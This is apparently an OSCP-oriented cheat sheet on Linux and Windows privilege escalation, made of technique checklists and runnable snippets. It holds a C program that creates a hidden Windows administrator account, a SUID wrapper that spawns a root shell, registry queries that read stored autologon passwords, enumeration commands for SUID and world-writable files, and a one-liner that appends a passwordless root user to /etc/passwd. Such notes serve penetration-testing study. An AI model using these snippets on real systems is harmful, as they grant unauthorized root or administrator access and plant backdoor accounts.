OSCP
Search…
Priv Escalation

Privilege Escalation

GTFOBins
Linux elevation of privileges
Windows elevation of privileges
FuzzySecurity | Windows Privilege Escalation Fundamentals

Linux Privilege Escalation

    sudo -l
    Kernel Exploits
    OS Exploits
    Password reuse (mysql, .bash_history, 000-default.conf...)
    Known binaries with suid flag and interactive (nmap)
    Custom binaries with suid flag either using other binaries or with command execution
    Writable files owned by root that get executed (cronjobs)
    MySQL as root
    Vulnerable services (chkrootkit, logrotate)
    Writable /etc/passwd
    Readable .bash_history
    SSH private key
    Listening ports on localhost
    /etc/fstab
    /etc/exports
    /var/mail
    Process as other user (root) executing something you have permissions to modify
    SSH public key + Predictable PRNG
    apt update hooking (Pre-Invoke)
    Capabilities

Windows Privilege Escalation

    Kernel Exploits
    OS Exploits
    Pass The Hash
    Password reuse
    DLL hijacking (Path)
    Vulnerable services
    Writable services binaries path
    Unquoted services
    Listening ports on localhost
    Registry keys

Kernel Exploits

1
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
2
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
3
http://www.fuzzysecurity.com/tutorials/16.html
Copied!
Windows Add User
1
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
2
3
int main ()
4
{
5
int i;
6
i=system ("net user <username> <password> /add && net localgroup administrators <username> /add");
7
return 0;
8
}
Copied!
SUID Change
1
SUID
2
3
Set owner user ID.
4
5
int main(void){
6
setresuid(0, 0, 0);
7
system("/bin/bash");
8
}
9
Copied!
1
Privilege Escalation:
2
#Find Binaries that will execute as the owner
3
find / -perm -u=s -type f 2>/dev/null
4
5
#Find binaries that will execute as the group
6
find / -perm -g=s -type f 2>/dev/null
7
8
#Find sticky-bit binaries
9
find / -perm -1000 -type d 2>/dev/null
10
11
find / -perm -4000 2>/dev/null
12
13
writable by everyone
14
find / -writable -type f 2>/dev/null
15
16
World writeable directories
17
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
18
19
World writeable files
20
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
21
22
Writeable config files
23
find /etc/ -writable -type f 2>/dev/null
24
25
find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null
26
Copied!
Window Exploit Suggester
1
python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
2
python windows-exploit-suggester.py –systeminfo systeminfo.txt –database 2018-11-25-mssb.xls
Copied!
Windows Priv Escalation
1
AlwaysInstallElevated
2
Check if the following registry settings are set to "1"
3
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
4
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
5
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
6
Copied!
Basic Linux Enumeration
1
Distribution type & kernel version
2
cat /etc/*release*
3
uname -a
4
rpm -q kernel
5
dmesg | grep -i linux
6
7
Default writeable directory / folder
8
/tmp
9
/dev/shm
10
11
Search for passwords
12
Search for password within config.php
13
grep -R 'password' config.php
14
15
Find possible other writeable directory / folder
16
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
17
18
Service(s) running as root user
19
ps aux | grep root
20
ps -ef | grep root
21
22
Installed applications
23
ls -lah /usr/bin/
24
ls -lah /sbin/
25
dpkg -l
26
rpm -qa
27
ls -lah /var/cache/apt/archivesO
28
ls -lah /var/cache/yum/
29
30
Scheduled jobs
31
crontab -l
32
ls -la /etc/cron*
33
ls -lah /var/spool/cron
34
ls -la /etc/ | grep cron
35
cat /etc/crontab
36
cat /etc/anacrontab
37
38
Find pattern in file:
39
grep -rnw '/etc/passwd' -e 'root'
40
41
Sticky bit, SGID, SUID, GUID
42
Sticky bit
43
find / -perm -1000 -type d 2>/dev/null
44
45
SGID (chmod 2000)
46
find / -perm -g=s -type f 2>/dev/null
47
48
SUID (chmod 4000)
49
find / -perm -u=s -type f 2>/dev/null
50
find /* -user root -perm -4000 -print 2>/dev/null
51
52
SUID or GUID
53
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
54
55
Add user to /etc/passwd and root group
56
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
57
Copied!
Last modified 1yr ago
Copy link